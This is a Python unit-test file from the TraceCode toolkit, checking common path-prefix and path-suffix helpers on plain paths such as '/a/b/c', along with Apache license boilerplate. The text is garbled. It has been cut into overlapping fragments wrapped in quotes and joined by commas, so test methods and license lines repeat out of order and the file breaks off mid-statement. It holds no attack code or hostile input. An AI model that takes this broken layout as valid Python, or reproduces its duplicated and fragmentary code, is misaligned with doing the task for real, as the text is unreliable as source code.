Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download. #", "test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test", "in writing, software distributed # under the License is distributed on an \"AS", "'a//a/d//b/c') assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert", "test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test", "# # Generated with TraceCode and provided on an \"AS IS\" BASIS, WITHOUT", "Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__", "work, you must accompany this data with the following acknowledgment: # # Generated", "the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR #", "= pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test =", "IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or", "an Attorney # for any legal advice. # TraceCode is a free and", "writing, software distributed # under the License is distributed on an \"AS IS\"", "the following acknowledgment: # # Generated with TraceCode and provided on an \"AS", "= pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt',", "honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path',", "and limitations under the License. # # When you publish or redistribute any", "pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/')", "or redistribute any data created with TraceCode or any TraceCode # derivative work,", "any TraceCode # derivative work, you must accompany this data with the following", "WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. No", "Unless required by applicable law or agreed to in writing, software distributed #", "'/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert", "def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self):", "def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self):", "== test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test", "('a/b', 2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1)", "version 2.0. # Data generated with TraceCode require an acknowledgment. # TraceCode is", "accompany this data with the following acknowledgment: # # Generated with TraceCode and", "and download. # from __future__ import absolute_import from __future__ import division from __future__", "('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2)", "== test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert ('a', 1) == test", "== test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('', '') assert (None, 0) == test", "'/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert", "law or agreed to in writing, software distributed # under the License is", "test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test", "within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) ==", "== test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test", "== test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test", "pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/')", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express", "assert ('a/b', 2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b',", "import unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c',", "(None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within", "test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test", "= pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a',", "test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test =", "assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None,", "test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test def test_common_path_prefix11(self): test =", "test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) == test def test_common_path_prefix11(self): test", "or implied. No content created from # TraceCode should be considered or used", "pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c')", "test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def", "# for any legal advice. # TraceCode is a free and open source", "TraceCode and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS", "test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def test_common_path_prefix19(self): test", "test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def", "0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0) ==", "('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2)", "0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/') assert (None, 0) ==", "import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3)", "test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test =", "segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test", "IS\" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or", "under the Apache License version 2.0. # Data generated with TraceCode require an", "test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def test_common_path_prefix19(self): test =", "# CONDITIONS OF ANY KIND, either express or implied. See the License for", "# OR CONDITIONS OF ANY KIND, either express or implied. No content created", "== test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test", "governing permissions and limitations under the License. # # When you publish or", "licensed under the Apache License version 2.0. # Data generated with TraceCode require", "= pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt',", "test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test =", "# # You may not use this software except in compliance with the", "= pathutils.common_path_prefix('/', '/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c',", "assert ('a/b', 2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a',", "'/a/b/c') assert ('a/b', 2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert", "(None, 0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('', '') assert (None, 0)", "pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt')", "# only segments are honored, commonality within segment is ignored test = pathutils.common_path_suffix(", "('a/b/c', 3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2)", "https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under the Apache License version 2.0.", "test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test =", "test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def", "http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software", "= pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('',", "TraceCode or any TraceCode # derivative work, you must accompany this data with", "test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test def", "(None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0)", "'/a/b/b.txt') assert ('a/b', 2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert", "of nexB Inc. # # You may not use this software except in", "== test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test", "the License. # # When you publish or redistribute any data created with", "test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0) == test def", "'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert", "import unicode_literals import unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test", "others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__ import absolute_import", "('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0)", "from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert", "= pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/',", "'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/')", "provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY", "== test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test", "def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self):", "('a/b', 2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2)", "as legal advice. Consult an Attorney # for any legal advice. # TraceCode", "'/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored,", "0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) ==", "assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c',", "is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def", "(None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0)", "def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self):", "you publish or redistribute any data created with TraceCode or any TraceCode #", "def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self):", "only segments are honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path',", "test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test =", "from __future__ import print_function from __future__ import unicode_literals import unittest from tracecode import", "def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self):", "pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c')", "== test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test", "pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b')", "not use this software except in compliance with the License. # You may", "with the following acknowledgment: # # Generated with TraceCode and provided on an", "KIND, either express or implied. No content created from # TraceCode should be", "0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) ==", "2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) ==", "'/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert", "are honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert", "test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self): test =", "test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): #", "= pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/',", "def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self):", "def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self):", "test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def", "All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed", "# Generated with TraceCode and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "legal advice. Consult an Attorney # for any legal advice. # TraceCode is", "== test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test", "'/a/') assert ('a', 1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert", "test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only", "under the License. # # When you publish or redistribute any data created", "= pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('',", "unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c')", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND,", "(None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2)", "(None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3)", "2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) ==", "('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0)", "or agreed to in writing, software distributed # under the License is distributed", "CONDITIONS OF ANY KIND, either express or implied. See the License for the", "== test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test", "3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) ==", "1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) ==", "== test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test", "test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test", "trademark of nexB Inc. # # You may not use this software except", "from __future__ import absolute_import from __future__ import division from __future__ import print_function from", "1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) ==", "test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test =", "any legal advice. # TraceCode is a free and open source software analysis", "== test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test", "0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment", "the License. # You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0", "and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__ import", "2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) ==", "__future__ import absolute_import from __future__ import division from __future__ import print_function from __future__", "# # When you publish or redistribute any data created with TraceCode or", "pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are", "an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either", "test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def", "be considered or used as legal advice. Consult an Attorney # for any", "pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b')", "== test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test", "pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/')", "assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None,", "open source software analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/", "test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test", "OR # CONDITIONS OF ANY KIND, either express or implied. See the License", "= pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt',", "test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def", "in compliance with the License. # You may obtain a copy of the", "pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/')", "= pathutils.common_path_suffix('', '/') assert (None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/',", "source software analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for", "software except in compliance with the License. # You may obtain a copy", "Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__ import absolute_import from __future__", "'/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert", "test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def", "def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self):", "TraceCode require an acknowledgment. # TraceCode is a trademark of nexB Inc. #", "(None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0)", "def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self):", "1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) ==", "('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0)", "legal advice. # TraceCode is a free and open source software analysis tool", "== test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test", "nexB Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The", "tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download.", "limitations under the License. # # When you publish or redistribute any data", "at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing,", "= pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt',", "def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self):", "def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self):", "pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/',", "# TraceCode is a free and open source software analysis tool from nexB", "'/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert", "assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None,", "software distributed # under the License is distributed on an \"AS IS\" BASIS,", "the # specific language governing permissions and limitations under the License. # #", "assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b',", "assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality", "== test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test", "test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def", "reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under the", "and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF", "is a trademark of nexB Inc. # # You may not use this", "WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. No content", "pathutils.common_path_prefix('/', '/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d')", "test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test", "test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test =", "License version 2.0. # Data generated with TraceCode require an acknowledgment. # TraceCode", "or used as legal advice. Consult an Attorney # for any legal advice.", "'/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert", "test = pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test =", "ANY KIND, either express or implied. No content created from # TraceCode should", "except in compliance with the License. # You may obtain a copy of", "agreed to in writing, software distributed # under the License is distributed on", "BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied.", "test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def", "'/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert", "test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test =", "of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed", "Apache License version 2.0. # Data generated with TraceCode require an acknowledgment. #", "class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test", "assert ('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a',", "commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2)", "('a/b', 2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1)", "support and download. # from __future__ import absolute_import from __future__ import division from", "should be considered or used as legal advice. Consult an Attorney # for", "analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and", "# from __future__ import absolute_import from __future__ import division from __future__ import print_function", "test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test", "1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) ==", "assert (None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None,", "0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) ==", "from # TraceCode should be considered or used as legal advice. Consult an", "'/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert", "pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) ==", "= pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt',", "'/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert", "def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def test_common_path_prefix_root_path(self):", "2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) ==", "test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def", "2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) ==", "# When you publish or redistribute any data created with TraceCode or any", "'/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert", "= pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/',", "data created with TraceCode or any TraceCode # derivative work, you must accompany", "CONDITIONS OF ANY KIND, either express or implied. No content created from #", "you must accompany this data with the following acknowledgment: # # Generated with", "1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) ==", "used as legal advice. Consult an Attorney # for any legal advice. #", "'/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert", "('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1)", "= pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/',", "segments are honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path')", "division from __future__ import print_function from __future__ import unicode_literals import unittest from tracecode", "redistribute any data created with TraceCode or any TraceCode # derivative work, you", "2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) ==", "test = pathutils.common_path_prefix('/a/b/c.txt', 